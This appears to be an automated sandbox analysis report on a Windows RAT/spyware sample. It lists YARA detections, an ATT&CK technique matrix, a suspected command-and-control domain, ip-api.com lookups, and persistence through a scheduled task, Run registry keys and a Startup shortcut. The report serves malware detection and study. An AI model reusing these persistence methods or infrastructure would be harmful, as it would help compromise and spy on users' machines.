                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\system logQueries volume information: C:\Users\user\AppData\Local\Temp\system log VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: Yara matchFile source: kj93GnZHBS.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: kj93GnZHBS.exe PID: 728, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPED

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: kj93GnZHBS.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: kj93GnZHBS.exe PID: 728, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: kj93GnZHBS.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: kj93GnZHBS.exe PID: 728, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPED
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                            Windows Management Instrumentation
                            2
                            Scheduled Task/Job
                            11
                            Process Injection
                            21
                            Masquerading
                            1
                            Input Capture
                            431
                            Security Software Discovery
                            Remote Services1
                            Input Capture
                            1
                            Encrypted Channel
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts2
                            Scheduled Task/Job
                            21
                            Registry Run Keys / Startup Folder
                            2
                            Scheduled Task/Job
                            11
                            Disable or Modify Tools
                            LSASS Memory1
                            Process Discovery
                            Remote Desktop Protocol11
                            Archive Collected Data
                            1
                            Ingress Tool Transfer
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell
                            1
                            DLL Side-Loading
                            21
                            Registry Run Keys / Startup Folder
                            61
                            Virtualization/Sandbox Evasion
                            Security Account Manager61
                            Virtualization/Sandbox Evasion
                            SMB/Windows Admin SharesData from Network Shared Drive2
                            Non-Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                            DLL Side-Loading
                            11
                            Process Injection
                            NTDS1
                            Application Window Discovery
                            Distributed Component Object ModelInput Capture12
                            Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information
                            LSA Secrets1
                            System Network Configuration Discovery
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                            Obfuscated Files or Information
                            Cached Domain Credentials1
                            File and Directory Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                            Software Packing
                            DCSync33
                            System Information Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading
                            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583091 Sample: kj93GnZHBS.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 40 drive-isp.gl.at.plly.gg 2->40 42 ip-api.com 2->42 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for dropped file 2->52 54 20 other signatures 2->54 8 kj93GnZHBS.exe 15 6 2->8         started        13 svchost.exe 2->13         started        15 system log 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 44 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 8->44 38 C:\Users\user\AppData\Local\Temp\system log, PE32 8->38 dropped 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 62 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->62 64 3 other signatures 8->64 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 46 127.0.0.1 unknown unknown 13->46 file6 signatures7 process8 signatures9 56 Loading BitLocker PowerShell Module 19->56 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            kj93GnZHBS.exe68%VirustotalBrowse
                            kj93GnZHBS.exe100%AviraTR/Spy.Gen
                            kj93GnZHBS.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\system log100%AviraTR/Spy.Gen
                            C:\Users\user\AppData\Local\Temp\system log100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\system log82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            drive-isp.gl.at.plly.gg0%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ip-api.com
                            208.95.112.1
                            truefalse
                              high
                              drive-isp.gl.at.plly.gg
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                drive-isp.gl.at.plly.ggtrue
                                • Avira URL Cloud: safe
                                unknown
                                http://ip-api.com/line/?fields=hostingfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://g.live.com/odclientsettings/Prod/C:edb.log.17.dr, qmgr.db.17.drfalse
                                    high
                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2113954304.000001DFAF182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2237067429.00000191DDC52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398730620.000001D410071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.mpowershell.exe, 00000008.00000002.2429348141.000001D47F770000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2654881780.00000166E1100000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2088403420.000001DF9F339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2161987113.00000191CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2293752624.000001D400229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2654881780.00000166E1100000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2088403420.000001DF9F339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2161987113.00000191CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2293752624.000001D400229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2113954304.000001DFAF182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2237067429.00000191DDC52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398730620.000001D410071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ip-api.comkj93GnZHBS.exe, 00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.ver)svchost.exe, 00000011.00000002.3267865139.000001FE85600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000011.00000003.2799873554.000001FE85440000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drfalse
                                                              high
                                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2088403420.000001DF9F111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2161987113.00000191CDBE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2293752624.000001D400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2484241631.00000166C89C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekj93GnZHBS.exe, 00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2088403420.000001DF9F111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2161987113.00000191CDBE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2293752624.000001D400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2484241631.00000166C89C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2654881780.00000166E1100000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    208.95.112.1
                                                                    ip-api.comUnited States
                                                                    53334TUT-ASUSfalse
                                                                    IP
                                                                    127.0.0.1
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1583091
                                                                    Start date and time:2025-01-01 21:57:07 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 37s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:19
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:kj93GnZHBS.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:d73c8c0df400ad51f19989a2e3a104929b31487992e20612912e3af75bb26ed8.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@20/25@2/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 16.7%
                                                                    HCA Information:
                                                                    • Successful, ratio: 99%
                                                                    • Number of executed functions: 58
                                                                    • Number of non-executed functions: 4
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45, 20.109.210.53
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target powershell.exe, PID 5296 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 5492 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 5944 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 6500 because it is empty
                                                                    • Execution Graph export aborted for target system log, PID 5436 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    TimeTypeDescription
                                                                    15:58:01API Interceptor61x Sleep call for process: powershell.exe modified
                                                                    15:59:03API Interceptor52x Sleep call for process: kj93GnZHBS.exe modified
                                                                    15:59:13API Interceptor2x Sleep call for process: OpenWith.exe modified
                                                                    15:59:14API Interceptor2x Sleep call for process: svchost.exe modified
                                                                    21:59:03Task SchedulerRun new task: system log path: C:\Users\user\AppData\Local\Temp\system s>log
                                                                    21:59:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run system log C:\Users\user\AppData\Local\Temp\system log
                                                                    21:59:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run system log C:\Users\user\AppData\Local\Temp\system log
                                                                    21:59:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system log.lnk
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    208.95.112.1ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                    • ip-api.com/line/?fields=hosting
                                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                    • ip-api.com/line/?fields=hosting
                                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                    • ip-api.com/json
                                                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                    • ip-api.com/xml
                                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                    • ip-api.com/json/?fields=225545
                                                                    Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                    • ip-api.com/line/?fields=hosting
                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                    • ip-api.com/json/?fields=61439
                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                    • ip-api.com/json/
                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                    • ip-api.com/json/?fields=61439
                                                                    987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • ip-api.com/line/?fields=hosting
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    ip-api.comANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                    • 208.95.112.1
                                                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                    • 208.95.112.1
                                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                    • 208.95.112.1
                                                                    Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                    • 208.95.112.1
                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                    • 208.95.112.1
                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                    • 208.95.112.1
                                                                    987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.95.112.1
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    TUT-ASUSANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                    • 208.95.112.1
                                                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                    • 208.95.112.1
                                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                    • 208.95.112.1
                                                                    Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                    • 208.95.112.1
                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                    • 208.95.112.1
                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                    • 208.95.112.1
                                                                    987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.95.112.1
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.830724603576473
                                                                    Encrypted:false
                                                                    SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugM:gJjJGtpTq2yv1AuNZRY3diu8iBVqFa
                                                                    MD5:4D3D6A4D828231E6C5D4DA33ED25ACAE
                                                                    SHA1:957A242F5450EE0E9F1B47560F148B5B06BE64BB
                                                                    SHA-256:C9E58AFC32F9CDFBB0938AA097B16F93A04C196AEEABC5E2F186EF77A671E295
                                                                    SHA-512:DE860A5FAD163D503EBD0486650A190D15AB767BCDC018C6BC13D3F758207694034CC30DD7DA39E7F6DEE285CCFF0896F84A6B9056CD67A6DDDCDDBDC8BC390D
                                                                    Malicious:false
                                                                    Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6031b130, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.658542912290118
                                                                    Encrypted:false
                                                                    SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                    MD5:E6C7D9BC0ECF4FCBF20D7099DF78AC40
                                                                    SHA1:0A5D2D2691BA011A30233E6DE8A5ADE09F5238F8
                                                                    SHA-256:C5B5213E08D561A4AD850B33BF976307ADF383D351A9DA4B540890DC49E03833
                                                                    SHA-512:0CEBA6CF88C24627E2E773BFD2010599AC362305ACEB64B394982EC48728AF95C48B668CED9C6B5BC920BA7E5663579F6C00F76D25B129CC38DC195D61853804
                                                                    Malicious:false
                                                                    Preview:`1.0... ...............X\...;...{......................0.z..........{...;...}9.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................O..;...}9.................^."I.;...}9..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.0798902038854098
                                                                    Encrypted:false
                                                                    SSDEEP:3:ltf/tKYeccbGuAJkhvekl1Crexrl/ollrekGltll/SPj:3f1Kz7rxlwreNlAJe3l
                                                                    MD5:CCAE589C810D73114CAC5CB658C2F7C8
                                                                    SHA1:0A3B4450401C2823F6EE6B40D25E2805731F240B
                                                                    SHA-256:FD25300B89F4B1697E6E70A9B58F94DC373FD917C0BAE8CD41723C8CA6C93C4C
                                                                    SHA-512:1155ED951BD0882920393E5879BC50D310DED56109367935E7E9B55E60BE4DB157441B87E0FCCC79D71F255F8F5D449E4F5F124039DCD93F2F0D471EF40E7C80
                                                                    Malicious:false
                                                                    Preview:.........................................;...{...;...}9......{...............{.......{...XL......{..................^."I.;...}9.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\system log
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):654
                                                                    Entropy (8bit):5.380476433908377
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Users\user\Desktop\kj93GnZHBS.exe
